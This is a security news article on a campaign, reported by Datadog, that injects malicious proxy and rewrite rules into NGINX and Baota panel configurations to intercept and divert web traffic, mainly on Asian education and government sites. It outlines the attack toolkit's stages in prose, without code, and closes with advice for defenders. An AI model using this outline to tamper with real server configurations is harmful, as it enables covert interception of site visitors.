Security analysts at Datadog have unmasked an ongoing traffic interception campaign targeting NGINX servers and hosting management interfaces, most notably the Baota panel prevalent throughout Asia. Adversaries are surreptitiously embedding deleterious directives into server configurations to reroute user solicitations through clandestine nodes, effectively establishing a “man-in-the-middle” posture between the web entity and its visitors.
The offensive is attributed to a threat actor previously associated with the React2Shell exploit. This collective now employs automated scripting suites to manipulate NGINX settings. Because these injected rules permit legitimate requests to proceed unhindered, administrators may remain oblivious to the compromise for protracted periods. However, a segment of the traffic is diverted to auxiliary servers where it can be subjected to analysis, content manipulation, or the injection of fraudulent advertisements and schemes.
The campaign predominantly targets Asian domain zones—including .in, .id, .pe, .bd, and .th—with a pronounced focus on educational and governmental institutions. Particular scrutiny is applied to servers managed via the Chinese Baota control panel, a staple among regional service providers.
Specialists elucidate that the incursion weaponizes the native capabilities of NGINX. Malicious directives are inserted into location blocks, leveraging proxy and rewrite functionalities. Consequently, an ingress request appears mundane but is redirected to a secondary server. To further obfuscate the interception, the adversaries manipulate HTTP headers to preserve the veneer of authentic user telemetry.
The discovered toolset operates with phased precision. An initial primary script retrieves auxiliary components, even when standard download utilities are restricted. Subsequently, specialized modules locate NGINX and Baota configuration files, audit them for prior infections, and meticulously append malicious snippets. To ensure service continuity and avoid triggering systemic alerts, the scripts perform a configuration validation followed by a graceful service reload. Should this fail, a forceful restart is executed.
Advanced iterations of these scripts are capable of traversing diverse file path structures across various Linux distributions and containerized environments. They maintain a comprehensive ledger of compromised domains and generate a master map of the incursion, which is then exfiltrated to the command-and-control (C2) infrastructure.
Administrators are urged to scrutinize NGINX configuration files for suspicious proxying rules or anomalous location blocks, particularly within environments utilizing hosting control panels. Furthermore, it is recommended to implement file integrity monitoring for configuration directories and to audit all service reboots to swiftly identify unauthorized modifications and thwart traffic interception.